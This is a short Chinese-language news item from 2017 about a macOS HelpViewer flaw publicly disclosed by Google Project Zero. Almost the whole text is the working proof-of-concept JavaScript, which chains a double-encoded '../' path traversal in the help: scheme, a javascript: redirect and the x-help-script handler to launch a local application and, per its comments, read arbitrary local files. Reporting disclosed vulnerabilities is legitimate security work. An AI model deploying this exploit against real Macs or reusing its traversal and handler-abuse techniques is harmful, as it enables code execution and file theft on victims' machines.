本文讲的是
神漏洞!macOS也能弹计算器,一行JS代码远程命令执行,
最近,Google Project Zero
公开披露
了一个macOS系统的神漏洞,一行JS代码便可以让Mac电脑弹计算器。
<script> /* OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read. HelpViewer is an application and using WebView to show a help file. You can see it simply by the command: open /Applications/Safari.app/Contents/Resources/Safari.help or using "help:" scheme: help:openbook=com.apple.safari.help help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest. HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../". PoC: document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)"; The attached poc will pop up a Calculator. Tested on macOS Sierra 10.12.1 (16B2659). */ function main() { function second() { var f = document.createElement("iframe"); f.onload = () => { f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app"; }; f.src = "help:openbook=com.apple.safari.help"; document.documentElement.appendChild(f); } var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));nsecond();"; document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url; } main(); </script>
原文发布时间为:2017年3月21日
本文作者:longye
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。